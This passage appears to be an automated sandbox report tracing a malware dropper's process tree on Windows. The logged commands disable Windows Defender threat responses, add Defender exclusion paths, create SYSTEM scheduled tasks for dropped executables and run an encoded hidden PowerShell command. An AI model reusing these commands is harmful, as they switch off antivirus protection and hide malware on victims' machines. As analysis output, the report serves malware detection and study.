        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 22:28:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS7FD9.tmp\Install.exe\" it /CUxdidbrUe 385118 /S" /V1 /F
        5⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:2336
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        5⤵
        
        PID:5860
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1464
      - C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        6⤵
        
        PID:3252
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        7⤵
        
        PID:5764

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1768

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4836

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:708

C:\Users\Admin\AppData\Local\Temp\7zS6D0D.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS6D0D.tmp\Install.exe it /iKSdidMBQJ 385118 /S
1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5780
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:4348
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:5216
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:5400
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:5996
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:4448
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:4720
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:5396
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:5128
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:5520
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:6004
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:5488
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:5980
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:5560
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:5632
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:96
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5636
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:1340
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Drops file in System32 directory
  PID:5140
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3052
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:2656
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2640
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5932
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:396
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5200
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6092
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5072
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5588
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4696
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1648
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4116
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4408
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5624
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4388
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4320
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4412
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5212
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4516
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5056
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5240
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5216
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5540
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5128
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4524
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5728
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:596
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5312
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:648
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  - Drops file in System32 directory
  PID:5552
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4484
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:6044
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5776
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5452
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3512
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2836
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1944
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2516
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3052
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2640
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5932
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:396
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5200
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6092
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5072
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5588
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4696
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3768
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gsIhIrLcU" /SC once /ST 01:01:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:5624
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gsIhIrLcU"
  2⤵
  PID:2128
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gsIhIrLcU"
  2⤵
  PID:224
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4952
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 20:47:54 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\OfDMGxv.exe\" GH /KcFEdidzv 385118 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:5988
